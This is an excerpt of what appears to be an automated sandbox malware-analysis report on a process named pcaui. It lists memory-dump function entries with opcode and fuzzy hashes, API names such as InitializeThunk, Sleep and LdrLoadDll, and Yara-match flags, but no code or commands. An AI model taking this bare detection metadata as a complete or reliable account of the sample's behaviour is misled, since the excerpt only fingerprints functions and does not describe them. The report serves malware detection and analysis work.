                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                    • Instruction ID: 09b50227317fcc0b00ceb69003c66df74e199cd130a21333526ad171af365a19
                                                                                    • Opcode Fuzzy Hash: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                    • Instruction Fuzzy Hash: 889002616015004261507159480441660059BE5305396C225A0555670C8618D955A26A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                    • Instruction ID: 3a088205638b0d737d516f981772ec1ee5442226376222bcfb3841d772319372
                                                                                    • Opcode Fuzzy Hash: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                    • Instruction Fuzzy Hash: BD90023160580012B1507159488455640059BE4305B56C121E0425674C8A14DA566362
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                    • Instruction ID: e954dc9a62869d5acce5c8a5faf8ca377f8c6780586c1450130cb14759bf2726
                                                                                    • Opcode Fuzzy Hash: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                    • Instruction Fuzzy Hash: 8F90023120148802F1207159840475A00058BD4305F5AC521A4425778D8695D9917122
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                    • Instruction ID: 2ebf845620946ae95afda4dce2bef4df7a94836508425cd97327b55d42969960
                                                                                    • Opcode Fuzzy Hash: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                    • Instruction Fuzzy Hash: 9A90023120140842F11071594404B5600058BE4305F56C126A0125774D8615D9517522
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                    • Instruction ID: c99258c2b026cc0c6a7741ab432a7e37724669227056482998b67190fc2d6e4c
                                                                                    • Opcode Fuzzy Hash: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                    • Instruction Fuzzy Hash: FA90023120140402F1107599540865600058BE4305F56D121A5025675EC665D9917132
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                    • Instruction ID: c286157c7f259d502d8100b6c2497a4f589f700f61c028ffcff190424eccb69d
                                                                                    • Opcode Fuzzy Hash: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                    • Instruction Fuzzy Hash: 7390022130140003F150715954186164005DBE5305F56D121E0415674CD915D9566223
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                    • Instruction ID: f6a588346f9271fb85ac93d01977c8c40445da2f371cdcd472252316c4e51bd4
                                                                                    • Opcode Fuzzy Hash: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                    • Instruction Fuzzy Hash: 9390022921340002F1907159540861A00058BD5206F96D525A0016678CC915D9696322
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                    • Instruction ID: cf788a138988e4b519366ce642e34164e6be60bbb069a560b1830b2ac4a2e370
                                                                                    • Opcode Fuzzy Hash: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                    • Instruction Fuzzy Hash: 2890023120140413F1217159450471700098BD4245F96C522A0425678D9656DA52B122
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                    • Instruction ID: c4f9a9e9bc8cda713ea5bef28835e30bff6817fa7b444b5dc11189daab241e7a
                                                                                    • Opcode Fuzzy Hash: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                    • Instruction Fuzzy Hash: 55900221242441527555B159440451740069BE4245796C122A1415A70C8526E956E622
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                    • Instruction ID: 432fa674191338cc366870597c62bda3df091ec8a6c2706863de63039936c829
                                                                                    • Opcode Fuzzy Hash: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                    • Instruction Fuzzy Hash: 3690026120180403F1507559480461700058BD4306F56C121A2065675E8A29DD517136
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                    • Instruction ID: bbfce90d39726ab3e231d49c1058be8873f2955c135eb3379b7b6ba3e1cf0789
                                                                                    • Opcode Fuzzy Hash: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                    • Instruction Fuzzy Hash: 9F90022160140502F11171594404626000A8BD4245F96C132A1025675ECA25DA92B132
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                    • Instruction ID: 8a0c87c75761a7ae36abc10059158c9c49aa6bde81d60bc92a643ae53a2491ae
                                                                                    • Opcode Fuzzy Hash: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                    • Instruction Fuzzy Hash: 5E90026134140442F11071594414B160005CBE5305F56C125E1065674D8619DD527127
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                    • Instruction ID: e24d4509c6d78deee3a843ca1bdcb78497efed686a9557c552386409164fef25
                                                                                    • Opcode Fuzzy Hash: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                    • Instruction Fuzzy Hash: 34900221211C0042F21075694C14B1700058BD4307F56C225A0155674CC915D9616522
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                    • Instruction ID: 923eabafbb8ea3c1d38c466959bfdf1fa47541231404c60837d08dddfa7eb121
                                                                                    • Opcode Fuzzy Hash: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                    • Instruction Fuzzy Hash: E0900221601400426150716988449164005AFE5215756C231A0999670D8559D9656666
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                    • Instruction ID: 4fb0b8e2b17bc898ec493d8bfad1a16aaee50c1a4172d484c326bd67c3373b2d
                                                                                    • Opcode Fuzzy Hash: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                    • Instruction Fuzzy Hash: 84900225221400022155B559060451B04459BDA355396C125F14176B0CC621D9656322
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                    • Instruction ID: 1261eb02577ab0633d2fa8567f1c2c4390e6b65ab731f0e44b1ba60622b784aa
                                                                                    • Opcode Fuzzy Hash: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                    • Instruction Fuzzy Hash: E4900225211400032115B559070451700468BD9355356C131F1016670CD621D9616122
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                    • Instruction ID: 7ad64ad574930a4fbcf3af8c3b4868c2c56b3d067bdda7f8c8bcb15689b3f2f4
                                                                                    • Opcode Fuzzy Hash: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                    • Instruction Fuzzy Hash: C790026120240003611571594414626400A8BE4205B56C131E10156B0DC525D9917126
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                    • Instruction ID: 40a357caa876bce63e6d5abd034ff4d334ae43aca5432d5f7b8d7c6c32fb30e5
                                                                                    • Opcode Fuzzy Hash: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                    • Instruction Fuzzy Hash: 5090023120140802F1907159440465A00058BD5305F96C125A0026774DCA15DB5977A2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                    • Instruction ID: 14939f167b7b97de3cf98cb3449565c9c7e56ea35f78308868d7f592f689b348
                                                                                    • Opcode Fuzzy Hash: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                    • Instruction Fuzzy Hash: C390023120544842F15071594404A5600158BD4309F56C121A00657B4D9625DE55B662
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                    • Instruction ID: ac75f257a34c22d4a6171dbf559f225aacfbfdb71b8b9f178c36cad7fe494f79
                                                                                    • Opcode Fuzzy Hash: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                    • Instruction Fuzzy Hash: B090023160540802F1607159441475600058BD4305F56C121A0025774D8755DB5576A2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                     • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                    • Instruction ID: ff43bdba3fd9e5af0560bbfcd333e4d786c9f9c0880c4cd5fccf892a08cc290a
                                                                                    • Opcode Fuzzy Hash: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                    • Instruction Fuzzy Hash: 2990023160550402F1107159451471610058BD4205F66C521A0425678D8795DA5175A3
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                    • Instruction ID: d512a95988a22c97c3bb30587de03a456fc8ea7c3ba967406f3121c93ffd84c5
                                                                                    • Opcode Fuzzy Hash: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                    • Instruction Fuzzy Hash: 0190022124545102F160715D44046264005ABE4205F56C131A08156B4D8555D9557222
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                    • Instruction ID: acd3982df84ee16ca69c21fdad30ff62b33a81c6494d9ed5f298c9ecf831e514
                                                                                    • Opcode Fuzzy Hash: aa776254b415a98ea4a82cf6e4842222d15e48cf981af06dcff67a3821408fb0
                                                                                    • Instruction Fuzzy Hash: F7313479A0060AAFDB10DFD8D8809EFB7B9BF88304B108559E509E7254D775AA45CBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                    • Instruction ID: 6c74463fd491f55ae7381d0f759a2126ebd76fc5c8b8ae029a8b7cbc05e46547
                                                                                    • Opcode Fuzzy Hash: f040f6aab1c3b51c13cca1e9043fef7527d279e6bdd630dc57b37a9cae803679
                                                                                    • Instruction Fuzzy Hash: D0313479A00209AFDB00DFD8D8809EFB7B9BF48304B104559E609E7254D775EE458BA0
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02823E3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: wininet.dll
                                                                                    • API String ID: 3472027048-3354682871
                                                                                    • Opcode ID: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                    • Instruction ID: 5ed13dd9a4e233cdb966aae0773d86451150075b4277228adcbdc8c9a041db1e
                                                                                    • Opcode Fuzzy Hash: 51293745134cc4d185ea79cc18547eea9f86914d1f6fc7df0704718da7b8f77d
                                                                                    • Instruction Fuzzy Hash: 63318DB9A01705BBD714DFA4CC80FEBB7B9EB88704F004559E61DAB280D3746A85CBA5
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02814932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
